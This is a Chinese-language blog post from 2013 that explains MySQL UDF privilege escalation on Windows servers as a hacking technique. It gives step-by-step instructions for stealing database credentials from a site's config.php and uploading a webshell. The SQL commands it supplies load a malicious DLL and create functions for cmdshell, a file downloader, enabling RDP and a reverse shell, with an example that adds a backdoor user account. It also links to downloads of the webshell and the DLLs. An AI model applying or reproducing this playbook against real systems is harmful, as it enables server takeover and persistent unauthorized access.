mysql udf 提权

mysql的udf提权方法

01 May 2013

UDF（用户定义函数）是一类对MYSQL服务器功能进行扩充的代码，通常是用C（或C++）写的。通过添加新函数，性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时，UDF通常是最好的选择。但同时，UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。

适用场合：

1、目标主机系统是Windows（Win2000、XP、Win2003）。

2、拥有该主机mysql中的某个用户账号，该账号需要有对mysql的insert和delete权限。

使用方法：

1、获取当前mysql的一个账号，一般情况下在网站的config.php文件就能找到（具体在哪个文件每个CMS都不一样）。

2、把udf专用的webshell传到服务器上，访问并进行数据库连接。

3、连接成功后，导出DLL文件。mysql<5.0，导出路径随意；5.0<=mysql<5.1，则需要导出至目标服务器的系统目录（如：system32），否则在下一步操作中你会看到“No paths allowed for shared library”错误；mysql>5.1，需要使用

show variables like '%plugin%';

语句查看插件安装路径，导出的时候指定DLL路径为插件路径。

4、使用SQL语句创建自定义函数。语法如下：

Create Function 函数名 returns string soname '导出的DLL路径';
// e.g. Create Function cmdshell returns string soname 'udf.dll';

常用函数名：

cmdshell    执行cmd;
downloader  下载者,到网上下载指定文件并保存到指定目录;
open3389    通用开3389终端服务,可指定端口(不改端口无需重启);
backshell   反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread     读注册表;
regwrite    写注册表;
shut        关机,注销,重启;
about       说明与帮助函数;

若mysql>=5.0，语句中的DLL不允许带全路径，如果在第二步中已将DLL导出到系统目录，那么你就可以省略路径而使命令正常执行，否则将会看到”Can't open shared library“错误。

如果提示“Function 'cmdshell' already exists”，则输入下列语句可以解决：

delete from mysql.func where name='cmdshell'

5、创建函数成功后，就可以通过sql语句去调用它了。语法如下：

select 创建的函数名 ('参数列表');
// e.g. select cmdshell("net user ghy459 hack0nair /add"); 创建一个用户ghy459，密码为hack0nair

 6、函数使用完后，我们需要把之前生成的DLL和创建的函数删除掉，但要注意次序，必须先删除函数再删除DLL。删除函数的语法如下：

drop function 创建的函数名;
// e.g. drop function cmdshell;

 附上一个udf.dll专用网马：下载

 

来自zafe大牛的udf技巧（转自：http://lcx.cc/?i=1900）：

1、导出的文件名不一定非是xxx.dll，可以是任意的。

create function sys_eval returns string soname 'udf.xox';

 2、提示错误 Can't open shared library 'fun.dll' (errno: 2 )

除了udf不存在、udf被杀，还有可能是你的udf版本不对，你拿32位的udf去在64位系统注册的话，一样会提示错误。

3、降权的mysql一样有用，能注册dll的话你一样能够执行命令，不过权限是根据mysql来的， 在不支持aspx，ws、shell.application被删得情况下还有一丝希望。

另附从slqmap里提取出来的udf打包，有32位的和64位的。（下载）